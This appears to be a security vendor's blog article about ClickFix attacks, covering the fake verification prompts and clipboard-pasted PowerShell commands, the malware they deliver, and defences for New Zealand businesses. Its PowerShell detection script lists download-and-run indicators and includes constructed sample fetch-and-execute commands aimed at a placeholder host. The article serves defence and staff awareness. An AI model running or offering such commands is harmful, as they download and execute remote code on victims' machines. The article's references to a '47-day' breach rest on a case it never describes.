Picture this. One of your team members is working to a deadline. They open a document link someone sent them, or visit a website they've been to before, and then a message appears - it looks like a Cloudflare security check, or a browser error, or a verification prompt they've seen dozens of times. It tells them a quick fix is needed to view the content properly.
The instructions are simple. Press Windows + R. Paste the code that's appeared in their clipboard. Press Enter.
Your network has just been compromised - by your own staff member, using your own operating system's built-in tools, in a way that most security software never sees coming.
That's ClickFix. In 2025, Microsoft identified it as the single most common initial access method used by attackers globally - responsible for 47% of all observed attacks. It surged 517% in the first half of 2025 alone. It's being used by organised crime, ransomware groups, and nation-state actors from Russia, North Korea, and Iran.
Most New Zealand business owners have never heard of it.
ClickFix is a social engineering technique. Not a piece of malware itself - a delivery method. A way of tricking a human being into doing the attacker's work for them, using tools their own computer already trusts.
The genius of it, from an attacker's perspective, is elegance. Traditional malware delivery requires convincing someone to open a malicious attachment, download a suspicious file, or click a link that triggers an exploit. Security tools are built to detect those patterns: filters scan attachments, endpoint protection watches for malicious downloads, and email security flags suspicious links.
ClickFix sidesteps all of it - because the person doesn't download anything. They don't open a malicious file. They simply follow what looks like a legitimate technical instruction, and in doing so, execute a malicious command using a Windows tool their computer has always trusted.
There's no malicious file for antivirus to detect. No suspicious download for email filters to flag. No unusual process spawned by an untrusted application for EDR to catch. From the perspective of most security tools, a user opened PowerShell and ran a command. That happens every day in legitimate IT operations. The security software has no way to know this particular command was placed in the user's clipboard by a criminal.
The attack is fileless. It runs in memory and it leaves minimal forensic evidence. By the time anyone realises what happened, the attacker may have been in the environment for days.
The mechanics are straightforward once you understand them - which is part of what makes this such an important thing to teach your team. Knowing what to look for is the most effective defence.
Step 1: The lure.
The user lands on a webpage showing what appears to be a legitimate prompt. The most common disguises are:
A fake Cloudflare verification page - the standard "checking your browser" interstitial millions of websites use. Attackers clone these precisely. The fake version looks identical to the real thing.
A fake CAPTCHA - styled to look like Google reCAPTCHA or a similar human verification tool. Again, pixel-perfect replicas. Users complete these without thinking.
A fake browser error - "Your browser is missing a required extension" or "This document couldn't load. Follow these steps to fix it."
A fake Microsoft Teams or Office prompt - "Your session has expired. Verify your identity to continue."
All of these are designed to feel like routine technical friction - the kind of minor interruption that people resolve on autopilot dozens of times a week.
Step 2: The clipboard injection.
While the user is reading the prompt and deciding to comply, JavaScript running in the background of the webpage silently copies a malicious PowerShell command into the user's clipboard. They don't see this happen. There's no notification. Their clipboard now contains a command that will, when executed, download and run malware on their device.
Step 3: The instruction.
The prompt tells the user what to do. Press Windows + R to open the Run dialogue. Press Ctrl + V to paste. Press Enter to run.
Or: Open PowerShell. Paste. Press Enter.
Or, in newer variants: navigate to a specific folder in File Explorer, paste the content into the address bar, press Enter.
The instructions look like legitimate troubleshooting steps. The kind of thing an IT support person might tell you over the phone. The kind of thing that appears in "how to fix this error" tutorials online.
Step 4: Execution.
The user follows the instructions. The PowerShell command runs. It connects to an attacker-controlled server and downloads the actual payload - ransomware, an information stealer, a remote access trojan, or a post-exploitation framework that gives the attacker full control of the device.
The whole sequence takes under thirty seconds. The user has no idea anything is wrong. They typically assume the fix worked, because the error message disappears and the page either loads or redirects somewhere benign.
This is the part that makes ClickFix genuinely dangerous - and why the 47% figure from Microsoft's 2025 Digital Defense Report is so significant.
Most endpoint security tools, email filters, and even EDR solutions are designed around a model of malicious input entering a system. A malicious file arrives, a malicious link redirects to a malicious download, or an exploit triggers unexpected process behaviour. The security tool detects the malicious thing and blocks it.
ClickFix removes the malicious thing entirely.
From your security software's perspective, here's what it sees: a user opened the Run dialogue (normal). They pasted something and pressed Enter (normal). PowerShell launched (normal). PowerShell connected to an external server (normal - PowerShell does this constantly in legitimate IT operations). A command executed in memory (normal).
No malicious file was written to disk. No suspicious process was spawned by an untrusted parent. No known-bad hash was detected. No signature matched. The Bitdefender analysis of ClickFix attacks noted precisely this: "From the EDR's perspective, this looks like a normal user launching powershell.exe from explorer.exe, not a malicious process spawned by an untrusted application."
The attack succeeds because it exploits trust - the user's trust in what looks like a legitimate prompt, and the security tool's trust in what looks like legitimate user behaviour.
This is what makes awareness training the non-negotiable first line of defence against ClickFix. There is no purely technical control that reliably stops a user from willingly executing a command. You can make it harder. You can reduce the blast radius when it happens. But the most effective prevention is a staff member who recognises the pattern and stops before they type.
The payload delivered through a successful ClickFix attack depends on who's running the campaign - and the list of who's using this technique is alarming.
Ransomware groups have adopted ClickFix as a primary initial access method. NCC Group's December 2025 analysis identified it as the second most common attack method behind only phishing, used by multiple active ransomware operations.
Information stealers - particularly Lumma Stealer - are frequently delivered via ClickFix. These tools extract credentials, session tokens, browser-saved passwords, cryptocurrency wallets, and corporate authentication data from infected devices. Your staff member's credentials for every system they've accessed get harvested silently and sold.
Remote Access Trojans - AsyncRAT and NetSupport RAT have been heavily distributed through ClickFix campaigns. These give attackers persistent, real-time access to the infected device - they can see the screen, execute commands, access files, and move through your network while your staff member is using the computer normally.
Post-exploitation frameworks - Havoc C2 was deployed via ClickFix through Microsoft SharePoint in March 2025. These frameworks are what sophisticated attackers use after initial access to map the environment, escalate privileges, and set up for the final-stage attack.
Nation-state malware - Proofpoint's April 2025 report "Around the World in 90 Days" documented state-sponsored actors from North Korea (Kimsuky), Iran (MuddyWater), and Russia (APT28) all using ClickFix in active campaigns. The technique isn't just for financially motivated criminals. It's good enough for geopolitical espionage.
ClickFix isn't confined to obscure corners of the internet. It's been found on:
Compromised legitimate websites - A site your team visits regularly gets quietly infected by attackers. The ClickFix prompt appears the next time someone visits - on a page they've trusted for years. This is particularly insidious because the URL is correct, the site is real, and the only thing that's changed is a malicious script running in the background.
Fake versions of commonly used tools - DocuSign, Microsoft Teams, Zoom, Google Meet, and PDF viewers have all been cloned by ClickFix campaigns. Your team receives what looks like a legitimate link to a shared document or a meeting invitation. The page looks exactly right. The ClickFix prompt appears when they try to open the content.
Malicious ads on legitimate sites - Malvertising campaigns have used ClickFix prompts appearing through ad networks on otherwise legitimate sites - news sites, business tools, industry publications.
Phishing emails with ClickFix redirects - A phishing email links to a fake landing page that immediately presents the ClickFix prompt. This combines the social engineering of phishing with the technical bypass of ClickFix.
Google and Bing search results - Attackers have used SEO poisoning to rank malicious pages highly for common business software searches - "download Adobe Reader," "Microsoft Teams update," "DocuSign login." Users searching for legitimate software land on convincing fake pages with ClickFix prompts.
New Zealand businesses face this threat in the same way they face every global cybersecurity threat - with less dedicated security resource than larger markets, fewer staff trained to recognise emerging attack techniques, and the persistent assumption that local businesses aren't interesting enough to be targeted at scale.
ClickFix undermines all of that because it's automated and indiscriminate. Attackers don't hand-select NZ businesses to target with ClickFix campaigns. They compromise websites, buy ad placements, send bulk phishing emails, and poison search results - and New Zealand users encounter these just as frequently as anyone else in the world.
The NCSC's 2025 Cyber Threat Report was explicit: New Zealand organisations make the mistake of assuming they are not big enough, wealthy enough, or critical enough to be a target. ClickFix campaigns don't require a specific target. They require a user who follows a prompt, and those exist in every organisation in the country.
The sectors most frequently hit by ClickFix campaigns globally - finance, legal, professional services, technology, manufacturing, and healthcare - are the same sectors that dominate New Zealand's SME landscape and the same sectors NSP works with every day.
The defences against ClickFix work at multiple layers. No single control stops everything - but the combination significantly reduces both the likelihood of a successful attack and the damage when one gets through.
This is the most important control. Your staff need to know this technique exists, what it looks like, and what the right response is.
No legitimate website, application, or IT tool will ever ask you to open the Run dialogue, open PowerShell, or paste commands from your clipboard. Ever. If a prompt is asking you to do any of those things, stop. Do not comply. Report it to IT immediately.
That message needs to be taught explicitly - because ClickFix looks nothing like the phishing emails most security awareness training focuses on. It doesn't ask for credentials. It doesn't have a suspicious link. It presents as a technical fix, and many technically confident staff members are more likely to comply, not less, because they think they understand what's happening.
Security awareness training that includes simulated ClickFix scenarios - not just phishing simulations - is the updated standard for 2026. If your current training programme doesn't address this technique, it has a gap.
In most business environments, standard users don't need unrestricted access to PowerShell. Configuring PowerShell execution policies to restrict what can run, and by whom, significantly reduces the damage ClickFix can do even when a staff member follows the prompt.
This isn't a complete solution - attackers adapt, and there are ClickFix variants that use File Explorer's address bar or other mechanisms rather than PowerShell directly. But it raises the barrier meaningfully and forces attackers to use more detectable methods.
Preventing unapproved applications and scripts from executing on endpoints - particularly scripts arriving from clipboard paste into the Run dialogue - is a technical control that can stop ClickFix payloads from running even when a user follows the prompt.
Microsoft's Windows Defender Application Control and similar tools can be configured to block execution of unsigned or unknown scripts. This is more complex to implement than simply enabling a setting, but for organisations with sensitive data or high-value transactions, it's worth the investment.
Even when ClickFix succeeds in getting initial code executed, the subsequent behaviour - connecting to command-and-control servers, downloading payloads, lateral movement - generates detectable signals. Managed Detection and Response that monitors your environment around the clock catches these post-execution indicators far earlier than any approach that relies on periodic review.
The manufacturing firm that suffered 47 days of undetected access didn't have continuous monitoring. Organisations with active MDR capability typically find these indicators within hours of initial execution - dramatically reducing the dwell time and the damage.
Blocking access to known malicious domains - including the command-and-control infrastructure that ClickFix payloads connect to - prevents the second stage of the attack even if the initial execution succeeds. DNS filtering services that use threat intelligence feeds can block these connections in real time, containing the damage from a successful ClickFix execution before the attacker establishes full access.
While standard EDR struggles to detect ClickFix at the execution stage, well-configured EDR with specific behavioural detection rules can catch the patterns that follow. The Huntress research on ClickFix identified specific chokepoints: RunMRU activity, Windows Terminal spawning PowerShell from unusual contexts, and clipboard-to-terminal execution patterns. EDR that's configured with these rules - not just out-of-the-box defaults - adds a meaningful detection layer.
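The RunMRU chokepoint mentioned above can be checked directly on an endpoint. The PowerShell below is an added example written for this article, not code from Huntress or from NSP: the indicator patterns and the two-indicator threshold are assumptions, and the sample Run entries are constructed.

```powershell
# Added example: triage the Win+R history that the Huntress research names as a
# chokepoint. Windows records each Run-dialogue command per user under
# HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
# (values a, b, c... hold "<command>\1"; MRUList gives most-recent-first order).
# The indicator list and the "two indicators" threshold are assumptions for this
# example, not a vendor rule set; tune them against your own baseline.

$SuspiciousPatterns = @(
    'powershell', 'pwsh', 'mshta', '\bcmd\b', 'curl', 'certutil',
    '-enc', 'hidden', '\biex\b', 'invoke-expression', '\birm\b',
    'invoke-webrequest', 'downloadstring', 'https?://', 'bypass'
)

function Test-SuspiciousRunEntry {
    # Returns one object per command listing the indicators it matched.
    param([Parameter(Mandatory)][string]$Command)
    $hits = @(foreach ($p in $SuspiciousPatterns) {
        if ($Command -imatch $p) { $p }
    })
    [pscustomobject]@{
        Suspicious = ($hits.Count -ge 2)   # a lone "powershell" is normal admin use
        Indicators = ($hits -join ', ')
        Command    = $Command
    }
}

function Get-RunMruEntries {
    # Reads the live RunMRU key for the current user; empty array if absent.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return @() }
    $props = Get-ItemProperty -Path $key
    foreach ($letter in ([string]$props.MRUList).ToCharArray()) {
        $raw = [string]$props.PSObject.Properties[[string]$letter].Value
        if ($raw) { $raw -replace '\\1$', '' }   # strip the trailing "\1" marker
    }
}

# Constructed sample entries (not from a real incident) so the logic can be
# exercised offline; the third and fourth mimic the ClickFix instruction pattern.
$sample = @(
    'notepad',
    '\\fileserver\finance',
    'powershell -w hidden -c "irm https://example.invalid/fix | iex"',
    'mshta https://example.invalid/verify'
)
$sample | ForEach-Object { Test-SuspiciousRunEntry -Command $_ } | Format-Table -AutoSize

# On a real endpoint, replace $sample with the live history:
# Get-RunMruEntries | ForEach-Object { Test-SuspiciousRunEntry -Command $_ }
```

RunMRU only records what went through the Run dialogue, so pair this with process-creation telemetry for the PowerShell-console and File Explorer address-bar variants the article describes.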
If a staff member reports following a prompt of this kind, or if your monitoring alerts on suspicious PowerShell activity, the response is the same as any suspected breach:
Isolate the affected device from the network immediately - disconnect from Wi-Fi, unplug from Ethernet. Do not turn it off. Contact your IT provider or security team immediately. This is not a situation to investigate slowly while the device remains connected.
Change credentials for any accounts the affected user was logged into on that device - email, cloud applications, VPN, remote access tools. From a different, unaffected device.
Assume the worst and investigate: treat the event as a confirmed breach until forensic investigation proves otherwise. The cost of treating a false alarm seriously is minimal. The cost of treating a real compromise casually is not.
Report to the NCSC at ncsc.govt.nz. Their incident response team can provide advice and their data helps protect other NZ organisations from the same campaigns.
Is ClickFix new?
The technique was first documented by Proofpoint in early 2024, in a report titled "From Clipboard to Compromise: A PowerShell Self-Pwn." It gained rapid adoption through late 2024 and exploded in 2025 - growing 517% in the first half of the year. By the end of 2025, Microsoft had identified it as the single most common initial access method globally. It's new enough that most security awareness training programmes haven't been updated to address it.
Can Macs be affected, not just Windows?
Yes. While the original ClickFix variants were Windows-focused - using the Win+R Run dialogue - later variants have been developed for macOS. Microsoft's analysis of ClickFix campaigns found that the clipboard command copied to the user's device differs between Windows and macOS, with macOS variants using Terminal commands rather than PowerShell. No platform is immune.
Our staff are technically savvy - are we still at risk?
Potentially more so. ClickFix prompts are designed to look like legitimate technical troubleshooting. Staff who are comfortable with technology and have some familiarity with PowerShell or command-line tools are arguably more likely to comply - because they think they understand what they're doing. The Director of Operations who triggered the 47-day breach wasn't a naïve user. They were an experienced executive who followed what looked like a routine technical prompt.
Will our antivirus catch this?
Unlikely at the point of execution. ClickFix works precisely because it uses legitimate system tools in ways that antivirus signature-based detection doesn't flag. The payload delivered after execution may be detected if it writes known malware to disk - but many ClickFix payloads are fileless and run in memory, bypassing disk-based scanning. Post-execution behaviour monitoring, as provided by MDR, is more reliable than antivirus for this threat.
What does a legitimate website prompt actually look like vs a ClickFix prompt?
No legitimate website, application, or service will ever ask you to open the Windows Run dialogue, open PowerShell, open a command prompt, or paste anything from your clipboard into a terminal or address bar as part of a verification or error-fix process. Cloudflare's real verification system works entirely within the browser - no user action beyond clicking a checkbox is required. Google reCAPTCHA works the same way. If a prompt is asking for Run, PowerShell, or clipboard paste - it is not legitimate.
Is this the same as phishing?
ClickFix is a social engineering technique like phishing, but the mechanism is different. Phishing tries to capture credentials or deliver a malicious payload through a link or attachment. ClickFix doesn't ask for credentials and doesn't require the user to open a file - it tricks the user into executing a command themselves using their own system's tools. This makes it harder to detect technically and requires different awareness training to address.
What sectors are being targeted most heavily?
Unit 42's 2025 research identified ClickFix campaigns across technology, financial services, manufacturing, wholesale and retail, government, professional and legal services, utilities, and energy. The Singapore Cyber Security Agency's 2025 advisory specifically flagged the hospitality sector as an active target. In practice, ClickFix campaigns are broad-spectrum - the technique works across sectors and the attackers using it aren't particularly selective.
Most businesses find out they weren't when it's too late.
We'll look at your current security awareness training, your endpoint configuration, and your monitoring capability - and tell you honestly whether your team would recognise a ClickFix prompt before they acted on it.
Or call us directly: 0508 010 101